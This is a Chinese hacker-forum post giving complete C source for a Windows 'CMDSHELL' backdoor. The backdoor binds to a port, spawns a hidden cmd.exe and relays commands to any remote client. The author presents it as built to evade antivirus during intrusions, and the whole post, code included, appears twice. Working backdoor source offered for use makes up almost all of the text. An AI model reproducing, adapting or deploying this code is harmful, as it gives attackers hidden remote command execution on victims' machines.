一个简单的CMDSHELL后门
文章作者: 小马/SmallHorse [E.S.T VIP](这个E.S.T VIP写不写是无所谓的)
信息来源: 邪恶八进制 中国
最近闲着无聊,自己琢磨着写了个简单的CMDSHELL后门。同时也避免了入侵时被杀毒软件K了。参考了T-CMD源代码和以前黑防的相关文章。从中学到了很多知识。
程序很简单,运行后默认打开1983端口,也可以自己设定端口,等待客户端来连接。连接可以使用nc。本来还想设计成服务让其开机后自动运行,由于时间问题等以后完善了。
用法:smallhorse [-p port] -p参数用于设置自己的端口
下面是源程序,贴出来和大家共同学习进步,同时希望高手不吝指教,小马在此谢了先。
QQ:11189658 E-MAIL:horse_man@163.com
在vc++6.0 WIN2003下编译通过
#include<winsock2.h>
#include <stdio.h>
#pragma comment (lib, "Ws2_32.lib")
int port=1983;
DWORD WINAPI ClientThread(LPVOID lpParam);
void Help()
{printf(" /***************************************\\\n");
printf(" |This SmallHorse's First CMDSHELL V0.1 |\n");
printf(" |Thanks For Using It! |\n");
printf(" |SmallHorse [E.S.T] VIP 2005.03 |\n");
printf(" |***************************************|\n");
printf(" |usage:smallhorse [-p port] |\n");
printf(" | port: Port Number To Listen On |\n");
printf(" | Default Port Is 1983 |\n");
printf(" \\***************************************/\n");
return;
}
void OpenDoor()
{
// 初始化 Winsock.
WSADATA wsaData;
SOCKET m_socket,AcceptClient;
sockaddr_in Service,Client;
int ClientSize,i=0;
int iResult = WSAStartup( MAKEWORD(2,2), &wsaData );
if ( iResult != NO_ERROR )
return;
// 创建一个 socket.
m_socket = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP );
if(m_socket==SOCKET_ERROR)
return;
Service.sin_family = AF_INET;
Service.sin_addr.s_addr = htonl(INADDR_ANY);
Service.sin_port = htons( port );
if(bind( m_socket, (SOCKADDR*)&Service, sizeof(Service) )==SOCKET_ERROR)
return;//邦定
if (listen(m_socket,5)==SOCKET_ERROR)
return;//最大监听列队5个
printf("\nsmallhorse Listen On Port: %d... ^*^\n",port);
ClientSize=sizeof(Client);
while(1)
{
AcceptClient=accept(m_socket,(SOCKADDR*)&Client,&ClientSize);
if(AcceptClient==SOCKET_ERROR)
return;//接受连接
printf( "Client Connected.\n");
char *sendbuf = "/***************************************\\\n\tThanks For Using...\n\tSmallHorse's CmdShell!\n\tGood Luck!\n\\***************************************/\n\n";
send( AcceptClient, sendbuf, strlen(sendbuf), 0 );
if(CreateThread(NULL,0,ClientThread,(LPVOID)&AcceptClient,0,NULL)==NULL)
printf("Create Thread Error!\n");
Sleep(1000);
}
WSACleanup();
return;
}
DWORD WINAPI ClientThread(LPVOID lpParam)
{int ret;
char Buf[1024];
HANDLE Rpipe,Wpipe,Wfile,Rfile;
SOCKET AcceptClient=(SOCKET)*(SOCKET*)lpParam;
SECURITY_ATTRIBUTES sa;
sa.nLength=sizeof(sa);
sa.bInheritHandle=TRUE;
sa.lpSecurityDescriptor=NULL;
ret=CreatePipe(&Rpipe,&Rfile,&sa,0);
ret=CreatePipe(&Wfile,&Wpipe,&sa,0); //建立两个管道,分别用于接收命令和显示结果
STARTUPINFO startinfo;
GetStartupInfo(&startinfo);
startinfo.dwFlags=STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
startinfo.hStdInput=Wfile;
startinfo.hStdError=startinfo.hStdOutput=Rfile;
startinfo.wShowWindow=SW_HIDE;
char cmdline[MAX_PATH];
GetSystemDirectory(cmdline,MAX_PATH);
strcat(cmdline,("\\cmd.exe"));
PROCESS_INFORMATION proinfo;
ret=CreateProcess(cmdline,NULL,NULL,NULL,1,0,NULL,NULL,&startinfo,&proinfo);
unsigned long ByteRec;
while(1)
{
Sleep(100);
PeekNamedPipe(Rpipe,Buf,1024,&ByteRec,0,0);
if(ByteRec){
ret=ReadFile(Rpipe,Buf,ByteRec,&ByteRec,0);
if(!ret)
break;
ret=send(AcceptClient,Buf,ByteRec,0);
if(ret<=0)
break;
}
else{
ByteRec=recv(AcceptClient,Buf,1024,0);
if(ByteRec<=0)
break;
ret=WriteFile(Wpipe,Buf,ByteRec,&ByteRec,0);
if(!ret)
break;
}
}
return 0;
}
int main(int argc, char *argv[])
{
Help();
if(argc==3)
if(!strcmp(argv[1],"-p"))
port=atoi(argv[2]);
OpenDoor();
return 0;
}
信息来源: 邪恶八进制 中国
最近闲着无聊,自己琢磨着写了个简单的CMDSHELL后门。同时也避免了入侵时被杀毒软件K了。参考了T-CMD源代码和以前黑防的相关文章。从中学到了很多知识。
程序很简单,运行后默认打开1983端口,也可以自己设定端口,等待客户端来连接。连接可以使用nc。本来还想设计成服务让其开机后自动运行,由于时间问题等以后完善了。
用法:smallhorse [-p port] -p参数用于设置自己的端口
下面是源程序,贴出来和大家共同学习进步,同时希望高手不吝指教,小马在此谢了先。
QQ:11189658 E-MAIL:horse_man@163.com
在vc++6.0 WIN2003下编译通过
#include<winsock2.h>
#include <stdio.h>
#pragma comment (lib, "Ws2_32.lib")
int port=1983;
DWORD WINAPI ClientThread(LPVOID lpParam);
void Help()
{printf(" /***************************************\\\n");
printf(" |This SmallHorse's First CMDSHELL V0.1 |\n");
printf(" |Thanks For Using It! |\n");
printf(" |SmallHorse [E.S.T] VIP 2005.03 |\n");
printf(" |***************************************|\n");
printf(" |usage:smallhorse [-p port] |\n");
printf(" | port: Port Number To Listen On |\n");
printf(" | Default Port Is 1983 |\n");
printf(" \\***************************************/\n");
return;
}
void OpenDoor()
{
// 初始化 Winsock.
WSADATA wsaData;
SOCKET m_socket,AcceptClient;
sockaddr_in Service,Client;
int ClientSize,i=0;
int iResult = WSAStartup( MAKEWORD(2,2), &wsaData );
if ( iResult != NO_ERROR )
return;
// 创建一个 socket.
m_socket = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP );
if(m_socket==SOCKET_ERROR)
return;
Service.sin_family = AF_INET;
Service.sin_addr.s_addr = htonl(INADDR_ANY);
Service.sin_port = htons( port );
if(bind( m_socket, (SOCKADDR*)&Service, sizeof(Service) )==SOCKET_ERROR)
return;//邦定
if (listen(m_socket,5)==SOCKET_ERROR)
return;//最大监听列队5个
printf("\nsmallhorse Listen On Port: %d... ^*^\n",port);
ClientSize=sizeof(Client);
while(1)
{
AcceptClient=accept(m_socket,(SOCKADDR*)&Client,&ClientSize);
if(AcceptClient==SOCKET_ERROR)
return;//接受连接
printf( "Client Connected.\n");
char *sendbuf = "/***************************************\\\n\tThanks For Using...\n\tSmallHorse's CmdShell!\n\tGood Luck!\n\\***************************************/\n\n";
send( AcceptClient, sendbuf, strlen(sendbuf), 0 );
if(CreateThread(NULL,0,ClientThread,(LPVOID)&AcceptClient,0,NULL)==NULL)
printf("Create Thread Error!\n");
Sleep(1000);
}
WSACleanup();
return;
}
DWORD WINAPI ClientThread(LPVOID lpParam)
{int ret;
char Buf[1024];
HANDLE Rpipe,Wpipe,Wfile,Rfile;
SOCKET AcceptClient=(SOCKET)*(SOCKET*)lpParam;
SECURITY_ATTRIBUTES sa;
sa.nLength=sizeof(sa);
sa.bInheritHandle=TRUE;
sa.lpSecurityDescriptor=NULL;
ret=CreatePipe(&Rpipe,&Rfile,&sa,0);
ret=CreatePipe(&Wfile,&Wpipe,&sa,0); //建立两个管道,分别用于接收命令和显示结果
STARTUPINFO startinfo;
GetStartupInfo(&startinfo);
startinfo.dwFlags=STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
startinfo.hStdInput=Wfile;
startinfo.hStdError=startinfo.hStdOutput=Rfile;
startinfo.wShowWindow=SW_HIDE;
char cmdline[MAX_PATH];
GetSystemDirectory(cmdline,MAX_PATH);
strcat(cmdline,("\\cmd.exe"));
PROCESS_INFORMATION proinfo;
ret=CreateProcess(cmdline,NULL,NULL,NULL,1,0,NULL,NULL,&startinfo,&proinfo);
unsigned long ByteRec;
while(1)
{
Sleep(100);
PeekNamedPipe(Rpipe,Buf,1024,&ByteRec,0,0);
if(ByteRec){
ret=ReadFile(Rpipe,Buf,ByteRec,&ByteRec,0);
if(!ret)
break;
ret=send(AcceptClient,Buf,ByteRec,0);
if(ret<=0)
break;
}
else{
ByteRec=recv(AcceptClient,Buf,1024,0);
if(ByteRec<=0)
break;
ret=WriteFile(Wpipe,Buf,ByteRec,&ByteRec,0);
if(!ret)
break;
}
}
return 0;
}
int main(int argc, char *argv[])
{
Help();
if(argc==3)
if(!strcmp(argv[1],"-p"))
port=atoi(argv[2]);
OpenDoor();
return 0;
}
